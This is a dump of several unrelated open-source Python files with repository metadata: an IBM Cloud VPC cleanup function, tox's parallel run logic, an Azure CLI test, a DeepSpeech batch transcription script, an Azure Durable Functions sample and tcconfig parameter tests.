vm_data["id"], nic_id
).get_result()
floating_ips = res.get("floating_ips", [])
for ip in floating_ips:
if ip["name"].startswith(RAY_RECYCLABLE):
print(f"Deleting IP: {ip['id']}")
ibm_vpc_client.delete_floating_ip(ip["id"])
print(f"Deleting VM: {vm_data['id']}")
ibm_vpc_client.delete_instance(id=vm_data["id"])
res = ibm_vpc_client.list_instances(vpc_id=vpc_id).get_result()
num_instances = res["total_count"]
# Delete VSIs if exist
if num_instances:
instances = res["instances"]
with ThreadPoolExecutor(num_instances) as ex:
for i in range(num_instances):
ex.submit(_del_instance, instances[i])
# wait until all vms are deleted to proceed
_poll_vpc_contains_vms(vpc_id)
def delete_unbound_vpc(vpc_id):
deleting_resource = True
while deleting_resource:
try:
ibm_vpc_client.delete_vpc(vpc_id).get_result()
deleting_resource = False
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("VPC doesn't exist.")
deleting_resource = False
if e.code == 409:
print("VPC still in use.")
# will retry until cloud functions timeout.
time.sleep(5)
def delete_vpc(vpc_id):
vpc_data = get_vpc_data(vpc_id)
if not vpc_data:
print((f"Failed to find a VPC with id={vpc_id}"))
return
print(f"Deleting vpc:{vpc_data['name']} with id:{vpc_id}")
delete_vms(vpc_id)
delete_subnets(vpc_data)
delete_gateways(vpc_id)
delete_unbound_vpc(vpc_id)
print(f"VPC {vpc_data['name']} and its attached resources were deleted successfully")
def main(dict):
global ibm_vpc_client, RESOURCE_GROUP_ID, ibm_cloud_sdk_core, ibm_vpc
def install_package(package):
pip_location_stdout = subprocess.run(['which', 'pip'], capture_output=True, text=True)
pip_location = pip_location_stdout.stdout.strip()
subprocess.call([pip_location, 'install', package], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
for package in ["ibm-vpc", "ibm-cloud-sdk-core"]:
install_package(package)
import ibm_vpc as _ibm_vpc
import ibm_cloud_sdk_core as _ibm_cloud_sdk_core
ibm_vpc = _ibm_vpc
ibm_cloud_sdk_core = _ibm_cloud_sdk_core
iam_api_key, RESOURCE_GROUP_ID, vpc_id, region = dict['iam_api_key'], dict['resource_group_id'], dict['vpc_id'], dict['region']
authenticator = ibm_cloud_sdk_core.authenticators.IAMAuthenticator(iam_api_key, url=None)
ibm_vpc_client = ibm_vpc.VpcV1('2022-06-30',authenticator=authenticator)
if not region:
raise Exception("VPC not found in any region")
ibm_vpc_client.set_service_url(f'https://{region}.iaas.cloud.ibm.com/v1')
delete_vpc(vpc_id=vpc_id)
return {"Status": "Success"}
"""
)
def get_headers(self):
return {
"Content-Type": "application/json",
"Accept": "application/json",
"Authorization": "Bearer " + ibm.get_oauth_token(),
}
def create_or_fetch_namespace(self):
"""returns namespace id.
creates a namespace with given name in specified region.
if namespace exists returns its id instead."""
def _create_new_namespace():
logger.info(
f"Creating a new namespace: {self.namespace_name} in {self.namespace_region}"
)
data = {
"name": self.namespace_name,
"resource_group_id": self.resource_group_id,
"resource_plan_id": "functions-base-plan",
}
res = requests.post(
self.cf_namespaces_url, headers=self.get_headers(), json=data
).json()
if res.status_code != 200:
logger.error(res.text)
namespace_id = res["id"]
logger.info(f"Created new namespace with id: {namespace_id}")
return namespace_id
def _get_cloud_function_namespaces_metadata(offset=0):
"""returns meta data on namespaces of ibm cloud functions within a specified region
:param offset - offset from the beginning of the list of results attained from the GET request,
which may contain up to 200 namespaces per http response"""
res = requests.get(
f"{self.cf_namespaces_url}?limit=200&offset={offset}",
headers=self.get_headers(),
)
return json.loads(res.text)
def _get_cloud_function_namespaces():
"""returns relevant metadata on existing namespaces within a given region."""
logger.info(
f"Obtaining Cloud Function namespaces in {self.namespace_region}"
)
namespaces = []
collecting_namespaces = True
max_limit = 200
offset = 0
# request for namespaces is limited to 200 at a time, thus the request is fulfilled in increments of 200s.
while collecting_namespaces:
namespace_metadata = _get_cloud_function_namespaces_metadata(offset)
if namespace_metadata["total_count"] == max_limit:
offset += max_limit
else:
collecting_namespaces = False
for name_space in namespace_metadata["namespaces"]:
if "name" in name_space: # API based namespace
namespaces.append(
{
"name": name_space["name"],
"type": "API_based",
"id": name_space["id"],
"region": name_space["location"],
}
)
else: # cloud foundry based namespace
namespaces.append(
{
"name": name_space["id"],
"type": "CF_based",
"region": name_space["location"],
}
)
return namespaces
namespaces_in_region = _get_cloud_function_namespaces()
target_namespace_id = None
if namespaces_in_region:
target_namespace_id = next(
(
namespace["id"]
for namespace in namespaces_in_region
if namespace["name"] == self.namespace_name
),
None,
)
if not target_namespace_id:
target_namespace_id = _create_new_namespace()
else:
logger.info(f"Reusing namespace: {target_namespace_id}")
return target_namespace_id
def _get_cloud_functions_actions(self, namespace_id):
"""returns meta data on namespaces of ibm cloud functions within a specified region
:param offset - offset from the beginning of the list of results attained from the GET request,
which may contain up to 200 namespaces per http response"""
res = requests.get(
f"{self.cf_namespaces_url}/{namespace_id}/actions?limit=200",
headers=self.get_headers(),
)
return json.loads(res.text)
def create_action(self, namespace_id):
logger.info(f"creating action on namespace: {namespace_id}")
# Define the function parameters
function_params = {
"exec": {"kind": "python:3.9", "code": self.function_code},
"limits": {"timeout": 600000},
}
res = requests.put(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true&overwrite=true",
headers=self.get_headers(),
data=json.dumps(function_params),
)
if res.status_code != 200:
logger.error(res.text)
return json.loads(res.text)
def delete_action(self, namespace_id):
"""return the deleted function's metadata if it existed."""
logger.info(f"deleting action on namespace: {namespace_id}")
res = requests.delete(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true",
headers=self.get_headers(),
)
if res.status_code != 200:
logger.warn(res.text)
return json.loads(res.text)
def invoke_action(self, namespace_id: str):
logger.info(f"invoking action on namespace: {namespace_id}")
payload = {
"iam_api_key": ibm.get_api_key(),
"resource_group_id": self.resource_group_id,
"vpc_id": self.vpc_id,
"region": self.vpc_region,
}
res = requests.post(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true",
headers=self.get_headers(),
data=json.dumps(payload),
)
if res.status_code != 200:
logger.error(res.text)
return json.loads(res.text)
def delete_cluster(self):
"""Deletes VPC with id==self.vpc_id.
1. creates a CloudFunctions namespace named ClusterCleaner.namespace_name if doesn't exists.
2. using idempotent function that deletes an action named ClusterCleaner.action_name if exists.
3. invokes the action to delete the VPC and all its resources."""
cf_namespace_id = self.create_or_fetch_namespace()
self.delete_action(cf_namespace_id)
self.create_action(cf_namespace_id)
self.invoke_action(cf_namespace_id)
|
9d1fe07e5381c69f1443f8cf7b916acf1066c792
|
47d69d21f53333d93d5ba9973840ef192808a090
|
/src/tox/session/cmd/run/common.py
|
1bc0fc77c6474bcd2bf6cdbd2d107541209f2caf
|
[
"MIT"
] |
permissive
|
tox-dev/tox
|
27ce3072e7faf5c88ed5305bbd66359369bba13d
|
da0885cd162fb02de866831a75eca9dcfe87eb36
|
refs/heads/main
| 2023-09-01T11:45:18.097559
| 2023-08-31T14:51:57
| 2023-08-31T14:51:57
| 68,465,360
| 3,512
| 624
|
MIT
| 2023-09-11T20:58:32
| 2016-09-17T16:54:22
|
Python
|
UTF-8
|
Python
| false
| false
| 17,665
|
py
|
common.py
|
"""Common functionality shared across multiple type of runs."""
from __future__ import annotations
import logging
import os
import random
import sys
import time
from argparse import Action, ArgumentError, ArgumentParser, Namespace
from concurrent.futures import CancelledError, Future, ThreadPoolExecutor, as_completed
from pathlib import Path
from signal import SIGINT, Handlers, signal
from threading import Event, Thread
from typing import TYPE_CHECKING, Any, Iterator, Optional, Sequence, cast
from colorama import Fore
from tox.config.types import EnvList
from tox.execute import Outcome
from tox.journal import write_journal
from tox.session.cmd.run.single import ToxEnvRunResult, run_one
from tox.tox_env.runner import RunToxEnv
from tox.util.ci import is_ci
from tox.util.graph import stable_topological_sort
from tox.util.spinner import MISS_DURATION, Spinner
if TYPE_CHECKING:
from tox.session.state import State
from tox.tox_env.api import ToxEnv
class SkipMissingInterpreterAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise ArgumentError(self, f"value must be 'config', 'true', or 'false' (got {value!r})")
setattr(namespace, self.dest, value)
class InstallPackageAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
if not values:
raise ArgumentError(self, "cannot be empty")
path = Path(cast(str, values)).absolute()
if not path.exists():
raise ArgumentError(self, f"{path} does not exist")
if not path.is_file():
raise ArgumentError(self, f"{path} is not a file")
setattr(namespace, self.dest, path)
def env_run_create_flags(parser: ArgumentParser, mode: str) -> None: # noqa: C901
# mode can be one of: run, run-parallel, legacy, devenv, config
if mode not in ("config", "depends"):
parser.add_argument(
"--result-json",
dest="result_json",
metavar="path",
of_type=Path,
default=None,
help="write a JSON file with detailed information about all commands and results involved",
)
if mode not in ("devenv", "depends"):
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="v",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
if mode not in ("devenv", "config", "depends"):
parser.add_argument(
"-n",
"--notest",
dest="no_test",
help="do not run the test commands",
action="store_true",
)
parser.add_argument(
"-b",
"--pkg-only",
"--sdistonly",
action="store_true",
help="only perform the packaging activity",
dest="package_only",
)
parser.add_argument(
"--installpkg",
help="use specified package for installation into venv, instead of packaging the project",
default=None,
of_type=Optional[Path],
action=InstallPackageAction,
dest="install_pkg",
)
if mode not in ("devenv", "depends"):
parser.add_argument(
"--develop",
action="store_true",
help="install package in development mode",
dest="develop",
)
if mode not in ("depends",):
class SeedAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
if values == "notset":
result = None
else:
try:
result = int(cast(str, values))
if result <= 0:
msg = "must be greater than zero"
raise ValueError(msg) # noqa: TRY301
except ValueError as exc:
raise ArgumentError(self, str(exc)) from exc
setattr(namespace, self.dest, result)
if os.environ.get("PYTHONHASHSEED", "random") != "random":
hashseed_default = int(os.environ["PYTHONHASHSEED"])
else:
hashseed_default = random.randint(1, 1024 if sys.platform == "win32" else 4294967295) # noqa: S311
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. Defaults to a random integer in the range "
"[1, 4294967295] ([1, 1024] on Windows). Passing 'notset' suppresses this behavior.",
action=SeedAction,
of_type=Optional[int],
default=hashseed_default,
dest="hash_seed",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="path",
help="for Python discovery first try the Python executables under these paths",
default=[],
)
if mode not in ("depends",):
parser.add_argument(
"--no-recreate-pkg",
dest="no_recreate_pkg",
help="if recreate is set do not recreate packaging tox environment(s)",
action="store_true",
)
list_deps = parser.add_mutually_exclusive_group()
list_deps.add_argument(
"--list-dependencies",
action="store_true",
default=is_ci(),
help="list the dependencies installed during environment setup",
)
list_deps.add_argument(
"--no-list-dependencies",
action="store_false",
dest="list_dependencies",
help="never list the dependencies installed during environment setup",
)
if mode not in ("devenv", "config", "depends"):
parser.add_argument(
"--skip-pkg-install",
dest="skip_pkg_install",
help="skip package installation for this run",
action="store_true",
)
def report(start: float, runs: list[ToxEnvRunResult], is_colored: bool, verbosity: int) -> int: # noqa: FBT001
def _print(color_: int, message: str) -> None:
if verbosity:
print(f"{color_ if is_colored else ''}{message}{Fore.RESET if is_colored else ''}") # noqa: T201
successful, skipped = [], []
for run in runs:
successful.append(run.code == Outcome.OK or run.ignore_outcome)
skipped.append(run.skipped)
duration_individual = [o.elapsed for o in run.outcomes] if verbosity >= 2 else [] # noqa: PLR2004
extra = f"+cmd[{','.join(f'{i:.2f}' for i in duration_individual)}]" if duration_individual else ""
setup = run.duration - sum(duration_individual)
msg, color = _get_outcome_message(run)
out = f" {run.name}: {msg} ({run.duration:.2f}{f'=setup[{setup:.2f}]{extra}' if extra else ''} seconds)"
_print(color, out)
duration = time.monotonic() - start
all_good = all(successful) and not all(skipped)
if all_good:
_print(Fore.GREEN, f" congratulations :) ({duration:.2f} seconds)")
return Outcome.OK
_print(Fore.RED, f" evaluation failed :( ({duration:.2f} seconds)")
if len(runs) == 1:
return runs[0].code if not runs[0].skipped else -1
return -1
def _get_outcome_message(run: ToxEnvRunResult) -> tuple[str, int]:
if run.skipped:
msg, color = "SKIP", Fore.YELLOW
elif run.code == Outcome.OK:
msg, color = "OK", Fore.GREEN
elif run.ignore_outcome:
msg, color = f"IGNORED FAIL code {run.code}", Fore.YELLOW
else:
msg, color = f"FAIL code {run.code}", Fore.RED
return msg, color
logger = logging.getLogger(__name__)
def execute(state: State, max_workers: int | None, has_spinner: bool, live: bool) -> int: # noqa: FBT001
interrupt, done = Event(), Event()
results: list[ToxEnvRunResult] = []
future_to_env: dict[Future[ToxEnvRunResult], ToxEnv] = {}
state.envs.ensure_only_run_env_is_active()
to_run_list: list[str] = list(state.envs.iter())
for name in to_run_list:
cast(RunToxEnv, state.envs[name]).mark_active()
previous, has_previous = None, False
try:
spinner = ToxSpinner(has_spinner, state, len(to_run_list))
thread = Thread(
target=_queue_and_wait,
name="tox-interrupt",
args=(state, to_run_list, results, future_to_env, interrupt, done, max_workers, spinner, live),
)
thread.start()
try:
thread.join()
except KeyboardInterrupt:
previous, has_previous = signal(SIGINT, Handlers.SIG_IGN), True
spinner.print_report = False # no need to print reports at this point, final report coming up
logger.error("[%s] KeyboardInterrupt - teardown started", os.getpid()) # noqa: TRY400
interrupt.set()
# cancel in reverse order to not allow submitting new jobs as we cancel running ones
for future, tox_env in reversed(list(future_to_env.items())):
cancelled = future.cancel()
# if cannot be cancelled and not done -> still runs
if cancelled is False and not future.done(): # pragma: no branch
tox_env.interrupt()
done.wait()
# workaround for https://bugs.python.org/issue45274
lock = getattr(thread, "_tstate_lock", None)
if lock is not None and lock.locked(): # pragma: no branch
lock.release() # pragma: no cover
# calling private method to fix thread state
thread._stop() # type: ignore[attr-defined] # pragma: no cover # noqa: SLF001
thread.join()
finally:
name_to_run = {r.name: r for r in results}
ordered_results: list[ToxEnvRunResult] = [name_to_run[env] for env in to_run_list]
# write the journal
write_journal(getattr(state.conf.options, "result_json", None), state._journal) # noqa: SLF001
# report the outcome
exit_code = report(
state.conf.options.start,
ordered_results,
state.conf.options.is_colored,
state.conf.options.verbosity,
)
if has_previous:
signal(SIGINT, previous)
return exit_code
class ToxSpinner(Spinner):
def __init__(self, enabled: bool, state: State, total: int) -> None: # noqa: FBT001
super().__init__(
enabled=enabled,
colored=state.conf.options.is_colored,
stream=state._options.log_handler.stdout, # noqa: SLF001
total=total,
)
def update_spinner(self, result: ToxEnvRunResult, success: bool) -> None: # noqa: FBT001
done = (self.skip if result.skipped else self.succeed) if success else self.fail
done(result.name)
def _queue_and_wait( # noqa: C901, PLR0913, PLR0915
state: State,
to_run_list: list[str],
results: list[ToxEnvRunResult],
future_to_env: dict[Future[ToxEnvRunResult], ToxEnv],
interrupt: Event,
done: Event,
max_workers: int | None,
spinner: ToxSpinner,
live: bool, # noqa: FBT001
) -> None:
try:
options = state._options # noqa: SLF001
with spinner:
max_workers = len(to_run_list) if max_workers is None else max_workers
completed: set[str] = set()
envs_to_run_generator = ready_to_run_envs(state, to_run_list, completed)
def _run(tox_env: RunToxEnv) -> ToxEnvRunResult:
spinner.add(tox_env.conf.name)
return run_one(
tox_env,
options.parsed.no_test or options.parsed.package_only,
suspend_display=live is False,
)
try:
executor = ThreadPoolExecutor(max_workers=max_workers, thread_name_prefix="tox-driver")
env_list: list[str] = []
while True:
for env in env_list: # queue all available
tox_env_to_run = cast(RunToxEnv, state.envs[env])
if interrupt.is_set(): # queue the rest as failed upfront
tox_env_to_run.teardown()
future: Future[ToxEnvRunResult] = Future()
res = ToxEnvRunResult(name=env, skipped=False, code=-2, outcomes=[], duration=MISS_DURATION)
future.set_result(res)
else:
future = executor.submit(_run, tox_env_to_run)
future_to_env[future] = tox_env_to_run
if not future_to_env:
result: ToxEnvRunResult | None = None
else: # if we have queued wait for completed
future = next(as_completed(future_to_env))
tox_env_done = future_to_env.pop(future)
try:
result = future.result()
except CancelledError:
tox_env_done.teardown()
name = tox_env_done.conf.name
result = ToxEnvRunResult(
name=name,
skipped=False,
code=-3,
outcomes=[],
duration=MISS_DURATION,
)
results.append(result)
completed.add(result.name)
env_list = next(envs_to_run_generator, [])
# if nothing running and nothing more to run we're done
final_run = not env_list and not future_to_env
if final_run: # disable report on final env
spinner.print_report = False
if result is not None:
_handle_one_run_done(result, spinner, state, live)
if final_run:
break
except BaseException: # pragma: no cover
logging.exception("Internal Error") # pragma: no cover
raise # pragma: no cover
finally:
executor.shutdown(wait=True)
finally:
try:
# call teardown - configuration only environments for example could not be finished
for name in to_run_list:
state.envs[name].teardown()
finally:
done.set()
def _handle_one_run_done(
result: ToxEnvRunResult,
spinner: ToxSpinner,
state: State,
live: bool, # noqa: FBT001
) -> None:
success = result.code == Outcome.OK
spinner.update_spinner(result, success)
tox_env = cast(RunToxEnv, state.envs[result.name])
if tox_env.journal: # add overall journal entry
tox_env.journal["result"] = {
"success": success,
"exit_code": result.code,
"duration": result.duration,
}
if live is False and state.conf.options.parallel_live is False: # teardown background run
out_err = tox_env.close_and_read_out_err() # sync writes from buffer to stdout/stderr
pkg_out_err_list = []
for package_env in tox_env.package_envs:
pkg_out_err = package_env.close_and_read_out_err()
if pkg_out_err is not None: # pragma: no branch
pkg_out_err_list.append(pkg_out_err)
if not success or tox_env.conf["parallel_show_output"]:
for pkg_out_err in pkg_out_err_list:
state._options.log_handler.write_out_err(pkg_out_err) # pragma: no cover # noqa: SLF001
if out_err is not None: # pragma: no branch # first show package build
state._options.log_handler.write_out_err(out_err) # noqa: SLF001
def ready_to_run_envs(state: State, to_run: list[str], completed: set[str]) -> Iterator[list[str]]:
"""Generate tox environments ready to run."""
order, todo = run_order(state, to_run)
while order:
ready_to_run: list[str] = []
new_order: list[str] = []
for env in order: # collect next batch of ready to run
if todo[env] - completed:
new_order.append(env)
else:
ready_to_run.append(env)
order = new_order
yield ready_to_run
def run_order(state: State, to_run: list[str]) -> tuple[list[str], dict[str, set[str]]]:
to_run_set = set(to_run)
todo: dict[str, set[str]] = {}
for env in to_run:
run_env = cast(RunToxEnv, state.envs[env])
depends = set(cast(EnvList, run_env.conf["depends"]).envs)
todo[env] = to_run_set & depends
order = stable_topological_sort(todo)
return order, todo
|
33be9a6cfead71b0842df603e9ed9ec815abe9cf
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/security/tests/latest/test_security_contacts_scenario.py
|
812a76ffd7880329d166cf7b48eed9519bda2608
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 1,631
|
py
|
test_security_contacts_scenario.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.testsdk import ScenarioTest
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
class SecurityCenterSecurityContactsTests(ScenarioTest):
def test_security_contacts(self):
security_contacts = self.cmd('az security contact list').get_output_in_json()
previous_contacts_count = len(security_contacts)
assert previous_contacts_count >= 0
self.cmd('az security contact create -n default1 --email john@contoso.com --alert-notifications off --alerts-admins off')
security_contacts = self.cmd('az security contact list').get_output_in_json()
assert len(security_contacts) >= 0
contact = self.cmd('az security contact show -n default1').get_output_in_json()
assert contact["email"] == "john@contoso.com"
self.cmd('az security contact create -n default1 --email lisa@contoso.com --alert-notifications off --alerts-admins off')
contact = self.cmd('az security contact show -n default1').get_output_in_json()
assert contact["email"] == "lisa@contoso.com"
self.cmd('az security contact delete -n default1')
security_contacts = self.cmd('az security contact list').get_output_in_json()
assert len(security_contacts) == previous_contacts_count
|
959c24d86d0dc57c03e4e25f6da368db16ddb816
|
a133a7c64f6e08def0f936898466990d1fd1b31f
|
/atomate/vasp/workflows/__init__.py
|
d337868373cddc700f8ecc51bce2836803bcf41e
|
[
"LicenseRef-scancode-hdf5",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
hackingmaterials/atomate
|
a6458f9323b8f14d7b4ebb6558fb578d50a3f1ed
|
f4060e55ae3a22289fde9516ff0e8e4ac1d22190
|
refs/heads/main
| 2023-08-07T21:53:24.701157
| 2023-07-25T22:28:06
| 2023-07-25T22:28:06
| 43,023,379
| 217
| 173
|
NOASSERTION
| 2023-08-25T22:09:48
| 2015-09-23T19:53:55
|
Python
|
UTF-8
|
Python
| false
| false
| 508
|
py
|
__init__.py
|
from .presets.core import (
wf_bandstructure,
wf_bandstructure_hse,
wf_bandstructure_no_opt,
wf_bandstructure_plus_boltztrap,
wf_bandstructure_plus_hse,
wf_bulk_modulus,
wf_dielectric_constant,
wf_dielectric_constant_no_opt,
wf_elastic_constant,
wf_elastic_constant_minimal,
wf_gibbs_free_energy,
wf_nmr,
wf_nudged_elastic_band,
wf_piezoelectric_constant,
wf_raman_spectra,
wf_static,
wf_structure_optimization,
wf_thermal_expansion,
)
|
d8303ebae3b21758541b02e57e7a859d98b0ac2c
|
51b8e63958f1dd5be979d4f79d900bee420eefdc
|
/batch_processing/driver.py
|
f227ee5832575b2792431f71b135d21c22eeb974
|
[] |
no_license
|
mozilla/DeepSpeech-examples
|
c46ea4bc4ebd1363a41761b638513647ff5333a5
|
0bfefeb8e4769e3c895b9bc6c5a34cfbdfcbd645
|
refs/heads/r0.9
| 2023-08-25T04:04:19.231750
| 2021-04-06T17:05:04
| 2021-04-06T17:05:04
| 225,900,000
| 763
| 405
| null | 2023-07-25T18:08:01
| 2019-12-04T15:35:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
driver.py
|
import glob
import json
import os
from os.path import expanduser
import click
import delegator
# first loop over the files
# convert them to wave
# record things in 16000hz in the future or you gret this
# Warning: original sample rate (44100) is different than 16000h.z Resampling might produce erratic speech recognition.
@click.command()
@click.option("--dirname", type=click.Path(exists=True, resolve_path=True))
@click.option("--ext", default=".mp3")
@click.option(
"--model",
default="deepspeech-0.9.3-models.pbmm",
type=click.Path(exists=True, resolve_path=True),
)
@click.option(
"--scorer",
default="deepspeech-0.9.3-models.scorer",
type=click.Path(exists=True, resolve_path=True),
)
# manage my library of podcasts
def main(dirname, ext, model, scorer):
print("main")
model = expanduser(model)
scorer = expanduser(scorer)
pattern = dirname + "/" + "*" + ext
audiorate = "16000"
print(pattern)
for filename in glob.glob(pattern):
print(filename)
wavefile = filename + ".wav"
convert_command = " ".join(
[
"ffmpeg",
"-i",
"'{}'".format(filename),
"-ar",
audiorate,
"'{}'".format(wavefile),
]
)
if not os.path.isfile(wavefile):
print(convert_command)
r = delegator.run(convert_command)
print(r.out)
else:
print("skipping wave conversion that exists")
command = " ".join(
[
"deepspeech",
"--model",
model,
"--scorer",
scorer,
"--audio",
"'{}'".format(wavefile),
# "--extended",
"--json",
]
)
print(command)
r = delegator.run(command)
with open(filename + ".json", "w") as fo:
print(r.out)
fo.write(r.out)
if __name__ == "__main__":
main()
|
3fe3c33e8841e6ca26c8546de2b2ba8324923c05
|
dea1c40b5bac7e8dfbcc33e587b15b4487fe25f4
|
/samples/function_chaining/E1_HelloSequence/__init__.py
|
d8945840dcfeabb53a2f35a7916a1127cca104d8
|
[
"MIT"
] |
permissive
|
Azure/azure-functions-durable-python
|
93503441d7ec26c7a54acc0843a88440765def1d
|
5d30ae3b6b1158b021eb848629c1399381d783a8
|
refs/heads/dev
| 2023-08-10T22:22:33.381414
| 2023-08-04T17:41:38
| 2023-08-04T17:41:38
| 167,911,661
| 104
| 54
|
MIT
| 2023-09-07T22:58:23
| 2019-01-28T06:38:12
|
Python
|
UTF-8
|
Python
| false
| false
| 431
|
py
|
__init__.py
|
import azure.functions as func
import azure.durable_functions as df
def orchestrator_function(context: df.DurableOrchestrationContext):
result1 = yield context.call_activity('E1_SayHello', "Tokyo")
result2 = yield context.call_activity('E1_SayHello', "Seattle")
result3 = yield context.call_activity('E1_SayHello', "London")
return [result1, result2, result3]
main = df.Orchestrator.create(orchestrator_function)
|
7845bff4b3af13cced84694d11e6b8134ec8e56b
|
86bd1a9b92ffe3edb1982515be7d482584b990ba
|
/test/test_traffic_control.py
|
176a8bc47b4e64be59fd6ccf5f21f441a0440bfa
|
[
"MIT"
] |
permissive
|
thombashi/tcconfig
|
e9202538382d371f34190947cbd3ac0b7332c4db
|
e14f9fbdb235e2d6b2748962735dcf3fa1f356f3
|
refs/heads/master
| 2023-08-19T22:51:56.590952
| 2022-09-26T13:42:13
| 2022-09-26T13:42:13
| 49,825,187
| 753
| 86
|
MIT
| 2021-12-12T03:54:10
| 2016-01-17T16:24:09
|
Python
|
UTF-8
|
Python
| false
| false
| 11,872
|
py
|
test_traffic_control.py
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import itertools
import pytest
from allpairspy import AllPairs
from humanreadable import ParameterError
from tcconfig._const import ShapingAlgorithm, Tc, TrafficDirection
from tcconfig._netem_param import (
MAX_CORRUPTION_RATE,
MAX_PACKET_DUPLICATE_RATE,
MAX_PACKET_LOSS_RATE,
MAX_REORDERING_RATE,
MIN_CORRUPTION_RATE,
MIN_PACKET_DUPLICATE_RATE,
MIN_PACKET_LOSS_RATE,
MIN_REORDERING_RATE,
NetemParameter,
)
from tcconfig.traffic_control import TrafficControl
from .common import is_invalid_param
MIN_VALID_PACKET_LOSS = 0.0000000232 # [%]
@pytest.fixture
def device_option(request):
return request.config.getoption("--device")
@pytest.mark.parametrize(
["value"],
[
["".join(opt_list)]
for opt_list in AllPairs(
[
["0.1", "+1.25", "25"],
["kbps", "Kbps", " Kibps", "mbps", "Mbps", " Mibps", "gbps", "Gbps", " Gibps"],
]
)
],
)
def test_TrafficControl_validate_bandwidth_rate_normal(value):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter("dummy", bandwidth_rate=value),
direction=TrafficDirection.OUTGOING,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
@pytest.mark.parametrize(
["value", "expected"],
[
["".join(opt_list), ParameterError]
for opt_list in AllPairs([["0.1", "1"], ["", "kb", "KB", "mb", "MB", "gb", "GB"]])
]
+ [["".join(value), ParameterError] for value in ("B", "K", "M", "G")]
+ [["0bps", ParameterError]],
)
def test_TrafficControl_validate_bandwidth_rate_exception_1(value, expected):
with pytest.raises(expected):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter(
"dummy",
bandwidth_rate=value,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
direction=TrafficDirection.OUTGOING,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
@pytest.mark.parametrize(
["value", "expected"],
[
["".join(opt_list), ParameterError]
for opt_list in itertools.product(["-1", "0", "0.0"], ["bps", "Kbps", "MKbps", "GKbps"])
],
)
def test_TrafficControl_validate_bandwidth_rate_exception_2(value, expected):
with pytest.raises(expected):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter(
"dummy",
bandwidth_rate=value,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
class Test_TrafficControl_validate:
@pytest.mark.parametrize(
[
"rate",
"direction",
"delay",
"delay_distro",
"loss",
"duplicate",
"corrupt",
"src_network",
"exclude_src_network",
"dst_network",
"exclude_dst_network",
"src_port",
"exclude_src_port",
"dst_port",
"exclude_dst_port",
"shaping_algorithm",
],
[
opt_list
for opt_list in AllPairs(
[
[None, "", "100Kbps", "0.5Mbps", "0.1Gbps"], # rate
[TrafficDirection.OUTGOING],
[Tc.ValueRange.LatencyTime.MIN, Tc.ValueRange.LatencyTime.MAX], # delay
[Tc.ValueRange.LatencyTime.MIN, Tc.ValueRange.LatencyTime.MAX], # delay_distro
[
None,
MIN_PACKET_LOSS_RATE,
MIN_VALID_PACKET_LOSS,
MAX_PACKET_LOSS_RATE,
], # loss
[None, MIN_PACKET_DUPLICATE_RATE, MAX_PACKET_DUPLICATE_RATE], # duplicate
[None, MIN_CORRUPTION_RATE, MAX_CORRUPTION_RATE], # corrupt
[None, "192.168.0.1", "192.168.0.0/24"], # src_network
[None, "192.168.0.1", "192.168.0.0/25"], # exclude_src_network
[
None,
"",
"192.168.0.1",
"192.168.0.254",
"192.168.0.1/32",
"192.168.0.0/24",
], # dst_network
[None, "192.168.0.1", "192.168.0.0/25"], # exclude_dst_network
[None, 65535], # src_port
[None, 22], # exclude_src_port
[None, 65535], # dst_port
[None, 22], # exclude_dst_port
[ShapingAlgorithm.HTB, ShapingAlgorithm.TBF], # shaping_algorithm
],
